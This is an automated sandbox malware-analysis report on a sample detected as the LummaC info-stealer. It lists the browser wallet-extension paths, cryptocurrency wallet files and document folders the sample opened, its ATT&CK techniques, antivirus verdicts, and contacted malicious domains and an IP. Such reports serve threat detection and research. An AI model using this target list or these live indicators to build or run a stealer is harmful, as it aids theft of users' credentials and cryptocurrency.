            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FACWLRWHGGJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\PSAMNLJHZWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\QVTVNIBKSDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: C:\Users\user\Documents\ZSSZYEFYMUJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_236.exe PID: 6236, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		321
            Security Software Discovery            		Remote Services1
            Credential API Hooking            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
            Deobfuscate/Decode Files or Information            		1
            Credential API Hooking            		11
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares31
            Data from Local System            		113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS2
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets112
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            LisectAVT_2403002A_236.exe100%AviraTR/Crypt.XPACK.Gen
            LisectAVT_2403002A_236.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            pooreveningfuseor.pw0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            edurestunningcrackyow.fun0%Avira URL Cloudsafe
            associationokeo.shop100%Avira URL Cloudmalware
            https://unhappytidydryypwto.shop/api#:100%Avira URL Cloudphishing
            unhappytidydryypwto.shop100%Avira URL Cloudphishing
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://unhappytidydryypwto.shop/100%Avira URL Cloudphishing
            colorfulequalugliess.shop100%Avira URL Cloudphishing
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://unhappytidydryypwto.shop:443/api100%Avira URL Cloudphishing
            turkeyunlikelyofw.shop100%Avira URL Cloudmalware
            https://unhappytidydryypwto.shop/api100%Avira URL Cloudphishing
            detectordiscusser.shop100%Avira URL Cloudmalware
            https://unhappytidydryypwto.shop/apin:L100%Avira URL Cloudphishing
            relevantvoicelesskw.shop100%Avira URL Cloudphishing
            https://unhappytidydryypwto.shop/44100%Avira URL Cloudphishing
            wisemassiveharmonious.shop0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            unhappytidydryypwto.shop
            		104.21.48.252
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              edurestunningcrackyow.funtrue
              • Avira URL Cloud: safe
              		unknown
              unhappytidydryypwto.shoptrue
              • Avira URL Cloud: phishing
              		unknown
              pooreveningfuseor.pwtrue
              • Avira URL Cloud: safe
              		unknown
              associationokeo.shoptrue
              • Avira URL Cloud: malware
              		unknown
              colorfulequalugliess.shoptrue
              • Avira URL Cloud: phishing
              		unknown
              turkeyunlikelyofw.shoptrue
              • Avira URL Cloud: malware
              		unknown
              detectordiscusser.shoptrue
              • Avira URL Cloud: malware
              		unknown
              wisemassiveharmonious.shoptrue
              • Avira URL Cloud: safe
              		unknown
              https://unhappytidydryypwto.shop/apifalse
              • Avira URL Cloud: phishing
              		unknown
              relevantvoicelesskw.shoptrue
              • Avira URL Cloud: phishing
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtabLisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://duckduckgo.com/ac/?q=LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.icoLisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://unhappytidydryypwto.shop/api#:LisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              https://unhappytidydryypwto.shop/LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.0000000001419000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.00000000013C5000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1372307247.0000000001469000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462355021.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1463876472.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.00000000013D9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.rootca1.amazontrust.com/rootca1.crl0LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://ocsp.rootca1.amazontrust.com0:LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.ecosia.org/newtab/LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://ac.ecosia.org/autocomplete?q=LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://unhappytidydryypwto.shop/apin:LLisectAVT_2403002A_236.exe, 00000000.00000003.1461606764.0000000001465000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1464141859.0000000001466000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              http://x1.c.lencr.org/0LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://x1.i.lencr.org/0LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://unhappytidydryypwto.shop:443/apiLisectAVT_2403002A_236.exe, 00000000.00000003.1387782522.0000000001468000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown
              http://crt.rootca1.amazontrust.com/rootca1.cer0?LisectAVT_2403002A_236.exe, 00000000.00000003.1388317441.000000000391C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://support.mozilla.org/products/firefoxgro.allLisectAVT_2403002A_236.exe, 00000000.00000003.1389454135.0000000003A2D000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=LisectAVT_2403002A_236.exe, 00000000.00000003.1361447801.0000000003937000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361401916.000000000393A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1361519752.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://unhappytidydryypwto.shop/44LisectAVT_2403002A_236.exe, 00000000.00000003.1418365611.0000000001466000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1405389775.0000000001465000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              104.21.48.252
              		unhappytidydryypwto.shopUnited States
              		13335CLOUDFLARENETUStrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1482389
              Start date and time:2024-07-25 22:13:53 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 3m 48s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:LisectAVT_2403002A_236.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 91%
              • Number of executed functions: 42
              • Number of non-executed functions: 68
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryDirectoryFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: LisectAVT_2403002A_236.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              16:14:45API Interceptor7x Sleep call for process: LisectAVT_2403002A_236.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              104.21.48.252file.exeGet hashmaliciousLummaCBrowse
                file.exeGet hashmaliciousLummaCBrowse

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  unhappytidydryypwto.shopfile.exeGet hashmaliciousLummaCBrowse
                  • 104.21.48.252
